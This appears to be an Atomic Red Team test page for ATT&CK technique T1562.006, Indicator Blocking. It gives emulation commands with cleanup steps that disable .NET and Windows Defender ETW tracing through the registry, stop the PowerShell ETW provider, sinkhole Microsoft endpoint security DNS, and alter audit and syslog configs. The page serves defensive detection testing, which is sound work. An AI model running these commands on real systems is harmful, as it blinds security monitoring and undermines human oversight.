T1562.006
Impair Defenses: Indicator Blocking
Description from ATT&CK
An adversary may attempt to block indicators or events typically captured by sensors from being gathered and analyzed. This could include maliciously redirecting(Citation: Microsoft Lamin Sept 2017) or even disabling host-based sensors, such as Event Tracing for Windows (ETW)(Citation: Microsoft About Event Tracing 2018), by tampering settings that control the collection and flow of event telemetry.(Citation: Medium Event Tracing Tampering 2018) These settings may be stored on the system in configuration files and/or in the Registry as well as being accessible via administrative utilities such as PowerShell or Windows Management Instrumentation.
For example, adversaries may modify the
Filevalue inHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Securityto hide their malicious actions in a new or different .evtx log file. This action does not require a system reboot and takes effect immediately.(Citation: disable_win_evt_logging)ETW interruption can be achieved multiple ways, however most directly by defining conditions using the PowerShell
Set-EtwTraceProvidercmdlet or by interfacing directly with the Registry to make alterations.In the case of network-based reporting of indicators, an adversary may block traffic associated with reporting to prevent central analysis. This may be accomplished by many means, such as stopping a local process responsible for forwarding telemetry and/or creating a host-based firewall rule to block traffic to specific hosts responsible for aggregating events, such as security information and event management (SIEM) products.
In Linux environments, adversaries may disable or reconfigure log processing tools such as syslog or nxlog to inhibit detection and monitoring capabilities to facilitate follow on behaviors. (Citation: LemonDuck) ESXi also leverages syslog, which can be reconfigured via commands such as
esxcli system syslog config setandesxcli system syslog config reload.(Citation: Google Cloud Threat Intelligence ESXi VIBs 2022)(Citation: Broadcom Configuring syslog on ESXi)
Atomic Tests
- Atomic Test #1: Auditing Configuration Changes on Linux Host
- Atomic Test #2: Auditing Configuration Changes on FreeBSD Host
- Atomic Test #3: Logging Configuration Changes on Linux Host
- Atomic Test #4: Logging Configuration Changes on FreeBSD Host
- Atomic Test #5: Disable Powershell ETW Provider - Windows
- Atomic Test #6: Disable .NET Event Tracing for Windows Via Registry (cmd)
- Atomic Test #7: Disable .NET Event Tracing for Windows Via Registry (powershell)
- Atomic Test #8: LockBit Black - Disable the ETW Provider of Windows Defender -cmd
- Atomic Test #9: LockBit Black - Disable the ETW Provider of Windows Defender -Powershell
- Atomic Test #10: Disable .NET Event Tracing for Windows Via Environment Variable HKCU Registry - Cmd
- Atomic Test #11: Disable .NET Event Tracing for Windows Via Environment Variable HKCU Registry - PowerShell
- Atomic Test #12: Disable .NET Event Tracing for Windows Via Environment Variable HKLM Registry - Cmd
- Atomic Test #13: Disable .NET Event Tracing for Windows Via Environment Variable HKLM Registry - PowerShell
- Atomic Test #14: Block Cybersecurity communication by leveraging Windows Name Resolution Policy Table
Atomic Test #1: Auditing Configuration Changes on Linux Host
Emulates modification of auditd configuration files
Supported Platforms: Linux
auto_generated_guid: 212cfbcf-4770-4980-bc21-303e37abd0e3
Inputs
| Name | Description | Type | Default Value |
|---|---|---|---|
| audisp_config_file_name | The name of the audispd configuration file to be changed | string | audispd.conf |
| auditd_config_file_name | The name of the auditd configuration file to be changed | string | auditd.conf |
| libaudit_config_file_name | The name of the libaudit configuration file to be changed | string | libaudit.conf |
Attack Commands: Run with bash! Elevation Required (e.g. root or admin)
sed -i '$ a #art_test_1562_006_1' /etc/audisp/#{audisp_config_file_name}
if [ -f "/etc/#{auditd_config_file_name}" ];
then sed -i '$ a #art_test_1562_006_1' /etc/#{auditd_config_file_name}
else sed -i '$ a #art_test_1562_006_1' /etc/audit/#{auditd_config_file_name}
fi
sed -i '$ a #art_test_1562_006_1' /etc/#{libaudit_config_file_name}Cleanup Commands
sed -i '$ d' /etc/audisp/#{audisp_config_file_name}
if [ -f "/etc/#{auditd_config_file_name}" ];
then sed -i '$ d' /etc/#{auditd_config_file_name}
else sed -i '$ d' /etc/audit/#{auditd_config_file_name}
fi
sed -i '$ d' /etc/#{libaudit_config_file_name}Atomic Test #2: Auditing Configuration Changes on FreeBSD Host
Emulates modification of auditd configuration files
Supported Platforms: Linux
auto_generated_guid: cedaf7e7-28ee-42ab-ba13-456abd35d1bd
Inputs
| Name | Description | Type | Default Value |
|---|---|---|---|
| auditd_config_file_name | The name of the auditd configuration file to be changed | string | audit_event |
Attack Commands: Run with sh! Elevation Required (e.g. root or admin)
echo '#art_test_1562_006_1' >> /etc/security/#{auditd_config_file_name}Cleanup Commands
sed -i "" '/#art_test_1562_006_1/d' /etc/security/#{auditd_config_file_name}Atomic Test #3: Logging Configuration Changes on Linux Host
Emulates modification of syslog configuration.
Supported Platforms: Linux
auto_generated_guid: 7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c
Inputs
| Name | Description | Type | Default Value |
|---|---|---|---|
| syslog_config_file_name | The name of the syslog configuration file to be changed | string | syslog.conf |
| rsyslog_config_file_name | The name of the rsyslog configuration file to be changed | string | rsyslog.conf |
| syslog_ng_config_file_name | The name of the syslog-ng configuration file to be changed | string | syslog-ng.conf |
Attack Commands: Run with bash! Elevation Required (e.g. root or admin)
if [ -f "/etc/#{syslog_config_file_name}" ];
then sed -i '$ a #art_test_1562_006_2' /etc/#{syslog_config_file_name}
fi
if [ -f "/etc/#{rsyslog_config_file_name}" ];
then sed -i '$ a #art_test_1562_006_2' /etc/#{rsyslog_config_file_name}
fi
if [ -f "/etc/syslog-ng/#{syslog_ng_config_file_name}" ];
then sed -i '$ a #art_test_1562_006_2' /etc/syslog-ng/#{syslog_ng_config_file_name}
fiCleanup Commands
if [ -f "/etc/#{syslog_config_file_name}" ];
then sed -i '$ d' /etc/#{syslog_config_file_name}
fi
if [ -f "/etc/#{rsyslog_config_file_name}" ];
then sed -i '$ d' /etc/#{rsyslog_config_file_name}
fi
if [ -f "/etc/syslog-ng/#{syslog_ng_config_file_name}" ];
then sed -i '$ d' /etc/syslog-ng/#{syslog_ng_config_file_name}
fiAtomic Test #4: Logging Configuration Changes on FreeBSD Host
Emulates modification of syslog configuration.
Supported Platforms: Linux
auto_generated_guid: 6b8ca3ab-5980-4321-80c3-bcd77c8daed8
Inputs
| Name | Description | Type | Default Value |
|---|---|---|---|
| syslog_config_file_name | The name of the syslog configuration file to be changed | string | syslog.conf |
Attack Commands: Run with sh! Elevation Required (e.g. root or admin)
if [ -f "/etc/#{syslog_config_file_name}" ];
then echo '#art_test_1562_006_2' >> /etc/#{syslog_config_file_name}
fiCleanup Commands
if [ -f "/etc/#{syslog_config_file_name}" ];
then sed -i "" '/#art_test_1562_006_2/d' /etc/#{syslog_config_file_name}
fiAtomic Test #5: Disable Powershell ETW Provider - Windows
This test was created to disable the Microsoft Powershell ETW provider by using the built-in Windows tool, logman.exe. This provider is used as a common source of telemetry in AV/EDR solutions.
Supported Platforms: Windows
auto_generated_guid: 6f118276-121d-4c09-bb58-a8fb4a72ee84
Inputs
| Name | Description | Type | Default Value |
|---|---|---|---|
| ps_exec_location | Location of PSExec. | string | PathToAtomicsFolder\..\ExternalPayloads\pstools\PsExec.exe |
| session | The session to disable. | string | EventLog-Application |
| provider | The provider to disable. | string | Microsoft-Windows-Powershell |
Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)
cmd /c "#{ps_exec_location}" -accepteula -i -s cmd.exe /c logman update trace "#{session}" --p "#{provider}" -etsCleanup Commands
cmd /c "#{ps_exec_location}" -i -s cmd.exe /c logman update trace "#{session}" -p "#{provider}" -etsDependencies: Run with powershell!
Description: PSExec must be installed on the machine.
Check Prereq Commands
if (Test-Path "#{ps_exec_location}") {exit 0} else {exit 1}Get Prereq Commands
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PStools.zip"
expand-archive -literalpath "PathToAtomicsFolder\..\ExternalPayloads\PStools.zip" -destinationpath "PathToAtomicsFolder\..\ExternalPayloads\pstools" -forceAtomic Test #6: Disable .NET Event Tracing for Windows Via Registry (cmd)
Disables ETW for the .NET Framework using the reg.exe utility to update the Windows registry
Supported Platforms: Windows
auto_generated_guid: 8a4c33be-a0d3-434a-bee6-315405edbd5b
Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)
REG ADD HKLM\Software\Microsoft\.NETFramework /v ETWEnabled /t REG_DWORD /d 0Cleanup Commands
REG DELETE HKLM\Software\Microsoft\.NETFramework /v ETWEnabled /f > nul 2>&1Atomic Test #7: Disable .NET Event Tracing for Windows Via Registry (powershell)
Disables ETW for the .NET Framework using PowerShell to update the Windows registry
Supported Platforms: Windows
auto_generated_guid: 19c07a45-452d-4620-90ed-4c34fffbe758
Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)
New-ItemProperty -Path HKLM:\Software\Microsoft\.NETFramework -Name ETWEnabled -Value 0 -PropertyType "DWord" -ForceCleanup Commands
REG DELETE HKLM\Software\Microsoft\.NETFramework /v ETWEnabled /f > $null 2>&1Atomic Test #8: LockBit Black - Disable the ETW Provider of Windows Defender -cmd
An adversary can disable the ETW Provider of Windows Defender, so nothing would be logged to Microsoft-Windows-Windows-Defender/Operational anymore. https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a
Supported Platforms: Windows
auto_generated_guid: f6df0b8e-2c83-44c7-ba5e-0fa4386bec41
Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" /v Enabled /t REG_DWORD /d 0 /fCleanup Commands
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" /v Enabled /f >nul 2>&1Atomic Test #9: LockBit Black - Disable the ETW Provider of Windows Defender -Powershell
An adversary can disable the ETW Provider of Windows Defender, so nothing would be logged to Microsoft-Windows-Windows-Defender/Operational anymore. https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a
Supported Platforms: Windows
auto_generated_guid: 69fc085b-5444-4879-8002-b24c8e1a3e02
Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)
New-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" -Name Enabled -PropertyType DWord -Value 0 -ForceCleanup Commands
Remove-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" -Name Enabled -Force -ErrorAction IgnoreAtomic Test #10: Disable .NET Event Tracing for Windows Via Environment Variable HKCU Registry - Cmd
Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled environment variable to 0 in the HKCU registry using the reg.exe utility. In order for changes to take effect a logout might be required.
Supported Platforms: Windows
auto_generated_guid: fdac1f79-b833-4bab-b4a1-11b1ed676a4b
Attack Commands: Run with command_prompt!
REG ADD HKCU\Environment /v COMPlus_ETWEnabled /t REG_SZ /d 0 /fCleanup Commands
REG DELETE HKCU\Environment /v COMPlus_ETWEnabled /f > nul 2>&1Atomic Test #11: Disable .NET Event Tracing for Windows Via Environment Variable HKCU Registry - PowerShell
Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled environment variable to 0 in the HKCU registry using PowerShell. In order for changes to take effect a logout might be required.
Supported Platforms: Windows
auto_generated_guid: b42c1f8c-399b-47ae-8fd8-763181395fee
Attack Commands: Run with powershell!
New-ItemProperty -Path HKCU:\Environment -Name COMPlus_ETWEnabled -Value 0 -PropertyType "String" -ForceCleanup Commands
Remove-ItemProperty -Path HKCU:\Environment -Name COMPlus_ETWEnabledAtomic Test #12: Disable .NET Event Tracing for Windows Via Environment Variable HKLM Registry - Cmd
Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled environment variable to 0 in the HKLM registry using the reg.exe utility. In order for changes to take effect a reboot might be required.
Supported Platforms: Windows
auto_generated_guid: 110b4281-43fe-405f-a184-5d8eaf228ebf
Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v COMPlus_ETWEnabled /t REG_SZ /d 0 /fCleanup Commands
REG DELETE "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v COMPlus_ETWEnabled /f > nul 2>&1Atomic Test #13: Disable .NET Event Tracing for Windows Via Environment Variable HKLM Registry - PowerShell
Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled environment variable to 0 in the HKLM registry using PowerShell. In order for changes to take effect a reboot might be required.
Supported Platforms: Windows
auto_generated_guid: 4d61779d-be7f-425c-b560-0cafb2522911
Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)
New-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" -Name COMPlus_ETWEnabled -Value 0 -PropertyType "String" -ForceCleanup Commands
Remove-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" -Name COMPlus_ETWEnabledAtomic Test #14: Block Cybersecurity communication by leveraging Windows Name Resolution Policy Table
Adversaries are redirecting DNS queries to an incorrect or malicious DNS server IP, thereby blocking legitimate communications and potentially compromising the security infrastructure. This atomic test aims to respond with 127.0.0.1 when a DNS query is made for endpoint.security.microsoft.com.
Supported Platforms: Windows
auto_generated_guid: 1174b5df-2c33-490f-8854-f5eb80c907ca
Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)
Add-DnsClientNrptRule -Namespace ".endpoint.security.microsoft.com" -NameServers 127.0.0.1 -Comment "Silenced by Name Resolution Policy Table"
Add-DnsClientNrptRule -Namespace "endpoint.security.microsoft.com" -NameServers 127.0.0.1 -Comment "Silenced by Name Resolution Policy Table"
Clear-DnsClientCacheCleanup Commands
try {
# Get all current NRPT rules
$DnsClientNrptRules = Get-DnsClientNrptRule | Where-Object { $_.Comment -eq 'Silenced by Name Resolution Policy Table' }
# Remove each NRPT rule
foreach ($rule in $DnsClientNrptRules) {
Remove-DnsClientNrptRule -Name $rule.Name -Force
}
# Clear DNS client cache
Clear-DnsClientCache
Write-Host "All NRPT rules have been removed and the DNS cache has been cleared."
}
catch {
Write-Host "An error occurred: $_"
}
Clear-DnsClientCacheAtomic test(s) for this technique last updated: 2025-05-01 15:20:38 UTC